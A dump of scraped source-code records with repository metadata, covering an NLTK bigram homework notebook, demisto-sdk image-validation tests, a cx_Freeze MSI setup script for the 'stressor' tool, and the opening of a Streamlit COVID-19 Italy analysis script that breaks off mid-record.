BigramCollocationFinder.from_words(wordlist2)\nbigram2_freq = finder2.score_ngrams(bigram_measures.raw_freq)\nbigram2_freq = bigram2_freq[:50]\nbigram2_freq\n\n\n# In[14]:\n\n\nfinder2. apply_freq_filter (5)\nbigram2_pmi = finder2.score_ngrams(bigram_measures.pmi)\nbigram2_pmi = bigram2_pmi[:50]\n\n\n# In[16]:\n\n\nworkbook1 = xlwt.Workbook(encoding='utf-8') \nsheet1 = workbook1.add_sheet(\"wordlist1_freq\",cell_overwrite_ok=True) \nfor i in range(len(wordlist1_freq)):\n sheet1.write(i,0,wordlist1_freq[i][0])\n sheet1.write(i,1,wordlist1_freq[i][1])\n i += 1\nworkbook1.save('/Users/lc/Desktop/CIS 668/HW/hw1/wordlist1_freq.xls') \n\n\n# In[17]:\n\n\nworkbook2 = xlwt.Workbook(encoding='utf-8') \nsheet2 = workbook2.add_sheet(\"wordlist2_freq\",cell_overwrite_ok=True) \nfor i in range(len(wordlist2_freq)):\n sheet2.write(i,0,wordlist2_freq[i][0])\n sheet2.write(i,1,wordlist2_freq[i][1])\n i += 1\nworkbook2.save('/Users/lc/Desktop/CIS 668/HW/hw1/wordlist2_freq.xls') \n\n\n# In[18]:\n\n\nworkbook3 = xlwt.Workbook(encoding='utf-8') \nsheet3 = workbook3.add_sheet(\"bigram1_freq\",cell_overwrite_ok=True) \nfor i in range(len(bigram1_freq)):\n sheet3.write(i,0,bigram1_freq[i][0][0])\n sheet3.write(i,1,bigram1_freq[i][0][1])\n i += 1\nworkbook3.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram1_freq.xls') \n\n\n# In[19]:\n\n\nworkbook4 = xlwt.Workbook(encoding='utf-8') \nsheet4 = workbook4.add_sheet(\"bigram2_freq\",cell_overwrite_ok=True) \nfor i in range(len(bigram2_freq)):\n sheet4.write(i,0,bigram2_freq[i][0][0])\n sheet4.write(i,1,bigram2_freq[i][0][1])\n i += 1\nworkbook4.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram2_freq.xls') \n\n\n# In[20]:\n\n\nworkbook5 = xlwt.Workbook(encoding='utf-8') \nsheet5 = workbook5.add_sheet(\"bigram1_pmi\",cell_overwrite_ok=True) \nfor i in range(len(bigram1_pmi)):\n sheet5.write(i,0,bigram1_pmi[i][0][0])\n sheet5.write(i,1,bigram1_pmi[i][0][1])\n i += 1\nworkbook5.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram1_pmi.xls') \n\n\n# In[21]:\n\n\nworkbook6 = xlwt.Workbook(encoding='utf-8') \nsheet6 = workbook6.add_sheet(\"bigram2_pmi\",cell_overwrite_ok=True) \nfor i in range(len(bigram2_freq)):\n sheet6.write(i,0,bigram2_pmi[i][0][0])\n sheet6.write(i,1,bigram2_pmi[i][0][1])\n i += 1\nworkbook6.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram2_pmi.xls') \n\n\n# In[28]:\n\n\nlist1 = [ pair[0] for pair in wordlist1_freq]\nlist2 = [ pair[0] for pair in wordlist2_freq]\nfreq_same = list(set(list1)&set(list2))\nfreq_same\n\n\n# In[29]:\n\n\nlist1_diff = list(set(list1)-set(freq_same))\nlist1_diff\n\n\n# In[31]:\n\n\nlist2_diff = list(set(list2)-set(freq_same))\nlist2_diff\n\n\n# In[32]:\n\n\nprint(len(freq_same),len(list1_diff),len(list2_diff))\n\n\n# In[53]:\n\n\nlist1 = [ pair[0] for pair in bigram1_freq]\nlist2 = [ pair[0] for pair in bigram2_freq]\nbgrFreq_same = list(set(list1)&set(list2)) \nprint(bgrFreq_same)\nprint(len(bgrFreq_same))\n\n\n# In[56]:\n\n\n# list1_diff = list(set(list1)-set(bgrFreq_same))\n# list2_diff = list(set(list2)-set(bgrFreq_same))\n# print(list1_diff)\n# print(list2_diff)\n\n\n# In[57]:\n\n\nlist1 = [ pair[0] for pair in bigram1_pmi]\nlist2 = [ pair[0] for pair in bigram2_pmi]\nbgrPmi_same = list(set(list1)&set(list2)) \nprint(bgrPmi_same)\nprint(len(bgrPmi_same))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "heyheyhey2020/CIS668_NLP_HW", "sub_path": "Address word analysis.py", "file_name": "Address word analysis.py", "file_ext": "py", "file_size_in_byte": 4915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nltk.corpus.PlaintextCorpusReader", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 49, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 49, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.FreqDist", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.collocations.BigramAssocMeasures", "line_number": 71, "usage_type": "call"}, {"api_name": "nltk.collocations", "line_number": 71, "usage_type": "attribute"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 108, "usage_type": "call"}, {"api_name": "nltk.FreqDist", "line_number": 114, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 139, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 151, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 163, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 175, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 187, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 199, "usage_type": "call"}]} +{"seq_id": "21451898561", "text": "import os\nfrom pathlib import Path\n\nimport pytest\n\nfrom demisto_sdk.commands.common.handlers import DEFAULT_JSON_HANDLER as json\nfrom demisto_sdk.commands.common.hook_validations import image\nfrom demisto_sdk.commands.common.hook_validations.integration import (\n IntegrationValidator,\n)\nfrom demisto_sdk.commands.common.legacy_git_tools import git_path\nfrom demisto_sdk.commands.common.tests.integration_test import mock_structure\nfrom TestSuite.file import File\nfrom TestSuite.test_tools import ChangeCWD\n\n\ndef test_is_not_default_image():\n int_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"integration-Zoom.yml\",\n )\n )\n image_validator = image.ImageValidator(int_path)\n assert image_validator.is_not_default_image() is False\n\n image_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"default_image.png\",\n )\n )\n image_validator = image.ImageValidator(image_path)\n assert image_validator.is_not_default_image() is False\n\n image_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/commands/init/templates\",\n \"HelloWorld\",\n \"HelloWorld_image.png\",\n )\n )\n image_validator = image.ImageValidator(image_path)\n assert image_validator.is_not_default_image() is False\n\n int_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"fake_integration.yml\",\n )\n )\n image_validator = image.ImageValidator(int_path)\n assert image_validator.is_not_default_image() is False\n\n\ndef test_is_valid_image_positive(monkeypatch):\n \"\"\"\n Given\n - An integration is with a valid non default image\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered valid\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"not_default_image_integration-Zoom.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n # Adding monkey patching this will make image validator behave like this is an integration outside of\n # pack context and ignore the image that's in the same folder as the file\n monkeypatch.setattr(\n \"demisto_sdk.commands.common.hook_validations.image.PACKS_INTEGRATION_NON_SPLIT_YML_REGEX\",\n integration_path,\n )\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is True\n\n\ndef test_image_in_both_yml_and_directory(monkeypatch):\n \"\"\"\n Given\n - An integration that has image in both yml file and in the yml directory\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered non-valid\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"not_default_image_integration-Zoom.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is False\n\n\ndef test_image_when_invalid_type(monkeypatch):\n \"\"\"\n Given\n - An integration that has an invalid image\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered non-valid.\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"not_default_image_integration-Zoom.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is False\n\n\ndef test_no_image_integration(monkeypatch):\n \"\"\"\n Given\n - A new integration yml that does not have an image in its pack\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered non-valid.\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"DummyPack\",\n \"Integrations\",\n \"integration-DummyIntegration.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is False\n\n\ndef test_json_outputs_where_no_image_in_integration(repo):\n \"\"\"\n Given\n - An integration without an existing image\n - A json file for writing the outputs\n\n When\n - Validating the image integration\n\n Then\n - Ensure that the outputs are correct.\n \"\"\"\n # Create pack and integration\n pack = repo.create_pack(\"PackName\")\n integration = pack.create_integration(\"IntName\")\n integration.create_default_integration()\n\n # Remove the integration image\n image_path = os.path.join(integration.path, \"IntName_image.png\")\n Path(image_path).unlink(missing_ok=True)\n\n with ChangeCWD(repo.path):\n # Run the image validator with a json file path\n json_file_path = os.path.join(integration.path, \"json_outputs.json\")\n image_validator = image.ImageValidator(\n integration.yml.path, json_file_path=json_file_path\n )\n\n # Check the outputs in the json file\n with open(image_validator.json_file_path) as r:\n json_outputs = json.loads(r.read())\n\n assert json_outputs[0][\"filePath\"] == image_path\n assert json_outputs[0][\"fileType\"] == \"png\"\n assert json_outputs[0][\"entityType\"] == \"image\"\n\n\ndef test_is_valid_image_name_with_valid_name(repo):\n \"\"\"\n Given\n - An integration image with a valid name\n\n When\n - Validating the integration image name\n\n Then\n - Ensure that image validator for integration passes.\n \"\"\"\n\n pack = repo.create_pack(\"PackName\")\n\n integration = pack.create_integration(\"IntName\")\n integration.create_default_integration()\n\n image_validator = image.ImageValidator(integration.yml.path)\n\n assert image_validator.is_valid_image_name()\n\n\n@pytest.mark.parametrize(\"file_name\", [\"IntName_img.png\", \"IntNameTest_image.png\"])\ndef test_is_valid_image_name_with_invalid_name(repo, file_name):\n \"\"\"\n Given\n - An integration image with invalid name (different from the folder name containing it)\n - An integration image with invalid name - invalid suffix (_img instead of _image)\n\n When\n - Validating the integration image name\n\n Then\n - Ensure that image validator for the integration failed in both cases.\n \"\"\"\n\n pack = repo.create_pack(\"PackName\")\n\n integration = pack.create_integration(\"IntName\")\n integration.create_default_integration()\n\n if Path(integration.image.path).exists():\n Path(integration.image.path).unlink()\n integration.image = None\n\n integration.image = File(\n integration._tmpdir_integration_path / f\"{file_name}\", integration._repo.path\n )\n\n with ChangeCWD(repo.path):\n\n image_validator = image.ImageValidator(integration.image.path)\n\n assert not image_validator.is_valid_image_name()\n", "repo_name": "demisto/demisto-sdk", "sub_path": "demisto_sdk/commands/common/tests/image_test.py", "file_name": "image_test.py", "file_ext": "py", "file_size_in_byte": 7474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 64, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.normpath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 21, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 26, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 32, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 37, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 43, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 48, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 48, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 54, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 59, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 59, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 76, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 81, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 105, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 110, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 128, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 133, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 151, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 158, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 182, "usage_type": "call"}, {"api_name": "TestSuite.test_tools.ChangeCWD", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 187, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 187, "usage_type": "name"}, {"api_name": "demisto_sdk.commands.common.handlers.DEFAULT_JSON_HANDLER.loads", "line_number": 193, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.handlers.DEFAULT_JSON_HANDLER", "line_number": 193, "usage_type": "name"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 217, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 217, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 241, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 242, "usage_type": "call"}, {"api_name": "TestSuite.file.File", "line_number": 245, "usage_type": "call"}, {"api_name": "TestSuite.test_tools.ChangeCWD", "line_number": 249, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 251, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 251, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 222, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 222, "usage_type": "attribute"}]} +{"seq_id": "1593239871", "text": "#!/usr/bin/env python\n\nimport os\nimport re\nimport sys\n\nfrom setuptools import find_packages, setup\nfrom cx_Freeze import setup, Executable # noqa re-import setup\n\nfrom stressor import __version__\n\n\n# Check for Windows MSI Setup\nif \"bdist_msi\" not in sys.argv: # or len(sys.argv) != 2:\n raise RuntimeError(\n \"This setup.py variant is only for creating 'bdist_msi' targets: {}\\n\"\n \"Example `{} bdist_msi`\".format(sys.argv, sys.argv[0])\n )\n\norg_version = __version__\n\n# 'setup.py upload' fails on Vista, because .pypirc is searched on 'HOME' path\nif \"HOME\" not in os.environ and \"HOMEPATH\" in os.environ:\n os.environ.setdefault(\"HOME\", os.environ.get(\"HOMEPATH\", \"\"))\n print(\"Initializing HOME environment variable to '{}'\".format(os.environ[\"HOME\"]))\n\n# Since we included pywin32 extensions, cx_Freeze tries to create a\n# version resource. This only supports the 'a.b.c[.d]' format.\n# Our version has either the for '1.2.3' or '1.2.3-a1'\nmajor, minor, patch = org_version.split(\".\", 3)\nmajor = int(major)\nminor = int(minor)\nif \"-\" in patch:\n # We have a pre-release version, e.g. '1.2.3-a1'.\n # This is presumably a post-release increment after '1.2.2' release.\n # It must NOT be converted to '1.2.3.1', since that would be *greater*\n # than '1.2.3', which is not even released yet.\n # Approach 1:\n # We cannot guarantee that '1.2.2.1' is correct either, so for\n # pre-releases we assume '0.0.0.0':\n # major = minor = patch = alpha = 0\n # Approach 2:\n # '1.2.3-a1' was presumably a post-release increment after '1.2.2',\n # so assume '1.2.2.1':\n patch, alpha = patch.split(\"-\", 1)\n patch = int(patch)\n # Remove leading letters\n alpha = re.sub(\"^[a-zA-Z]+\", \"\", alpha)\n alpha = int(alpha)\n if patch >= 1:\n patch -= 1 # 1.2.3-a1 => 1.2.2.1\n else:\n # may be 1.2.0-a1 or 2.0.0-a1: we don't know what the previous release was\n major = minor = patch = alpha = 0\nelse:\n patch = int(patch)\n alpha = 0\n\nversion = \"{}.{}.{}.{}\".format(major, minor, patch, alpha)\nprint(\"Version {}, using {}\".format(org_version, version))\n\ntry:\n readme = open(\"README.md\", \"rt\").read()\nexcept IOError:\n readme = \"(readme not found. Running from tox/setup.py test?)\"\n\ninstall_requires = [\n \"dateutil\", # NOTE: import 'dateutil' although PyPI package is named 'python-dateutil'\n \"fabulist\",\n \"lxml\",\n \"requests\",\n \"snazzy\",\n \"yaml\", # NOTE: 'yaml' although PyPI package is named 'PyYAML'\n]\nsetup_requires = install_requires\ntests_require = [] # \"pytest\", \"pytest-cov\", \"tox\", \"virtualenv\"]\n\n# # cx_Freeze seems to be confused by module name 'PyYAML' which\n# # must be imported as 'yaml', so we rename here. However it must\n# # be listed as 'PyYAML' in the requirements.txt and be installed!\n# install_requires.remove(\"PyYAML\")\n# install_requires.append(\"yaml\")\n\nexecutables = [\n Executable(\n script=\"stressor/stressor_cli.py\",\n base=None,\n targetName=\"stressor.exe\",\n icon=\"docs/logo.ico\",\n shortcutName=\"stressor\",\n copyright=\"(c) 2020-2021 Martin Wendt\",\n )\n]\n\n# See https://cx-freeze.readthedocs.io/en/latest/distutils.html#build-exe\nbuild_exe_options = {\n # \"init_script\": \"Console\",\n \"includes\": install_requires,\n # \"packages\": [\"keyring.backends\"], # loaded dynamically\n \"constants\": \"BUILD_COPYRIGHT='(c) 2020-2021 Martin Wendt'\",\n}\n\n# See https://cx-freeze.readthedocs.io/en/latest/distutils.html#bdist-msi\nbdist_msi_options = {\n \"upgrade_code\": \"{3DA14E9B-1D2A-4D90-92D0-2375CF66AC3D}\",\n \"add_to_path\": True,\n # \"all_users\": True,\n # \"install_icon\": \"docs/logo.ico\",\n}\n\npackages = find_packages(exclude=[\"test\"])\n\nsetup(\n name=\"stressor\",\n version=version,\n author=\"Martin Wendt\",\n author_email=\"stressor@wwwendt.de\",\n # copyright=\"(c) 2020-2021 Martin Wendt\",\n maintainer=\"Martin Wendt\",\n maintainer_email=\"stressor@wwwendt.de\",\n url=\"https://github.com/mar10/stressor\",\n description=\"Synchronize directories using FTP(S), SFTP, or file system access.\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n # Not required for this build-only setup config:\n classifiers=[],\n keywords=\"web server load test stress\",\n license=\"The MIT License\",\n install_requires=install_requires,\n setup_requires=setup_requires,\n tests_require=tests_require,\n packages=packages,\n package_data={\n # If any package contains *.txt files, include them:\n # \"\": [\"*.css\", \"*.html\", \"*.ico\", \"*.js\"],\n \"\": [\"*.tmpl\"],\n \"stressor.monitor\": [\"htdocs/*.*\"],\n },\n zip_safe=False,\n extras_require={},\n # cmdclass={\"test\": ToxCommand, \"sphinx\": SphinxCommand},\n entry_points={\"console_scripts\": [\"stressor = stressor.stressor_cli:run\"]},\n executables=executables,\n options={\"build_exe\": build_exe_options, \"bdist_msi\": bdist_msi_options},\n)\n", "repo_name": "simrit1/stressor", "sub_path": "setup_bdist_msi.py", "file_name": "setup_bdist_msi.py", "file_ext": "py", "file_size_in_byte": 4945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "stressor.__version__", "line_number": 20, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 24, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "cx_Freeze.Executable", "line_number": 85, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 111, "usage_type": "call"}, {"api_name": "cx_Freeze.setup", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "36645290158", "text": "import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport plotly.express as px\nimport datetime\nfrom datetime import date, timedelta\nfrom sklearn.cluster import KMeans\nfrom fbprophet import Prophet\nfrom fbprophet.plot import plot_plotly, add_changepoints_to_plot\nimport plotly.offline as py\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom statsmodels.graphics.tsaplots import plot_acf, plot_pacf\nimport statsmodels.api as sm\nfrom keras.models import Sequential\nfrom keras.layers import LSTM,Dense\nfrom keras.layers import Dropout\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.preprocessing.sequence import TimeseriesGenerator\nimport streamlit as st\n\nst.title('COVID 19')\n\nst.subheader('SINTOMI COVID 19')\nsymptoms={'symptom':['Fever',\n 'Dry cough',\n 'Fatigue',\n 'Sputum production',\n 'Shortness of breath',\n 'Muscle pain',\n 'Sore throat',\n 'Headache',\n 'Chills',\n 'Nausea or vomiting',\n 'Nasal congestion',\n 'Diarrhoea',\n 'Haemoptysis',\n 'Conjunctival congestion'],'percentage':[87.9,67.7,38.1,33.4,18.6,14.8,13.9,13.6,11.4,5.0,4.8,3.7,0.9,0.8]}\n\nsymptoms=pd.DataFrame(data=symptoms,index=range(14))\nsymptoms\n\nfig = px.bar(symptoms[['symptom', 'percentage']].sort_values('percentage', ascending=False), \n y=\"percentage\", x=\"symptom\", color='symptom', \n log_y=True, template='ggplot2', title='Symptom of Coronavirus')\nfig.show()\nplt.figure(figsize=(15,15))\nplt.title('Symptoms of Coronavirus',fontsize=20) \nplt.pie(symptoms['percentage'],autopct='%1.1f%%')\nplt.legend(symptoms['symptom'],loc='best')\n\nst.pyplot()\n\n\n# **Reading Data**\n\n# %% [code]\ndata=pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/covid19-ita-regions.csv\")\n\n# %% [code]\nan_data = pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/COVID19_open_line_list.csv\")\n\n# %% [code]\ncomp = pd.read_excel('https://github.com/terence92/covid-19/blob/master/COVID-19-3.27-top30-500.xlsx?raw=true')\n\n# %% [code]\nprovince = pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/covid19_italy_province.csv\")\n\ndat = pd.read_csv(\"https://raw.githubusercontent.com/terence92/covid-19/master/covid19_italy_province.csv\")\n\n# %% [markdown]\n# **Looking into data**\n\n# %% [code]\n\n# %% [code]\nan_data = an_data[an_data['country']=='Italy']\nan_data.shape\nst.dataframe(an_data)\n\n# %% [markdown]\n# **Age distribution of Confirmation**\nst.subheader('DISTRIBUZIONE ANNI CASI CONFERMATI')\n# %% [code]\nplt.figure(figsize=(10,6))\nsns.set_style(\"darkgrid\")\nplt.title(\"Age distribution of Confirmation\")\nsns.kdeplot(data=an_data['age'], shade=True).set(xlim=(0))\nst.pyplot()\n\n\n# %% [markdown]\n# > **Age**\n# \n# **Here, the graph shows the age distribution of the infected people by gender. We can clearly see older people are more likely to be infected, especially older people with having lung disease and problems in their respiratory system. The age group of 40 to 50yr are more infected than the rest of the population in men. On the other hand age groups of 50yr to 70yr are more infected in womens. As Dr.Steven Gambert, professor of medicine and director of geriatrics at the University of Maryland School of Medicine says “ Older people have higher risk of underlying health conditions, older people are already under physical stress, and their immune systems, even if not significantly compromised, simply do not have the same “ability to fight viruses and bacteria”. As data says Italy has the oldest population across globe by count. According to EU statistics Italy has the lowest percentage of young people**.\n\n# %% [markdown]\n# **Gender Distribution of Confirmatioin**\nst.subheader('DISTRIBUZIONE DI GENERE COVID 19')\n# %% [code]\nplt.figure(figsize=(15, 5))\nplt.title('Gender')\nan_data.sex.value_counts().plot.bar();\n\n# %% [code]\nfig = px.pie( values=an_data.groupby(['sex']).size().values,names=an_data.groupby(['sex']).size().index)\nfig.update_layout(\n font=dict(\n size=15,\n color=\"#242323\"\n )\n ) \n \nst.pyplot()\n\n\ndata.head()\n\n# %% [markdown]\n# **Checking for Null Value**\n\n# %% [code]\ndata.isna().sum()\n\n# %% [markdown]\n# **Description of Data**\n\n# %% [code]\ndata.describe().T\n\n# %% [markdown]\n# **Tracking the Patient**\n\n# %% [code]\ndata.shape\n\ndata['Date'] = pd.to_datetime(data['Date']).dt.normalize()\ndaily = data.sort_values(['Date','Country','RegionName'])\nlatest = data[data.Date == daily.Date.max()]\nlatest.head()\n\ndata_groupby_region = latest.groupby(\"RegionName\")[['TotalPositiveCases', 'Deaths', 'Recovered','TestsPerformed','HospitalizedPatients','TotalHospitalizedPatients']].sum().reset_index()\ndgr = data_groupby_region \ndgr.head()\n\n# %% [markdown]\n# **Desciption of Grouped Data by Region**\n\n# %% [code]\ndgr.describe().T\n\n# %% [markdown]\n# **Test performed vs Region**\nst.subheader('tamponi REGIONE')\n# %% [code]\nfig = px.bar(dgr[['RegionName', 'TestsPerformed']].sort_values('TestsPerformed', ascending=False), \n y=\"TestsPerformed\", x=\"RegionName\", color='RegionName', \n log_y=True, template='ggplot2', title='Test Performed vs Region')\n\nst.pyplot()\n\n# %% [markdown]\n# **As the graph shows the test performed in different regions of Italy. Lombardia has the maximum number(25k+) of tests performed as it is the most infected in cities. As a result the next graph shows that it has the maximum number(7280) of positive coronavirus patients. Veneto is the second most infected city here followed by some more countries like Emilia Romagna, Lazio, Marche, Toscana, Piemonte, Friuli V.G. ,Campania, Sicilia, Liguria, Puglia, P.A. Trento, Calabria, Umbria, Abruzzo, Sardegna, Molisa, Basilicata, Valle d'Aosta, P.A. Bolzano etc.\n# **\n\n# %% [markdown]\n# **Confirmed Cases vs Region**\nst.subheader('CASI CONFERMATI - REGIONE')\n# %% [code]\nfig = px.bar(dgr[['RegionName', 'TotalPositiveCases']].sort_values('TotalPositiveCases', ascending=False), \n y=\"TotalPositiveCases\", x=\"RegionName\", color='RegionName', \n log_y=True, template='ggplot2', title='Confirmed Cases vs Region')\nfig.show()\nst.pyplot()\n", "repo_name": 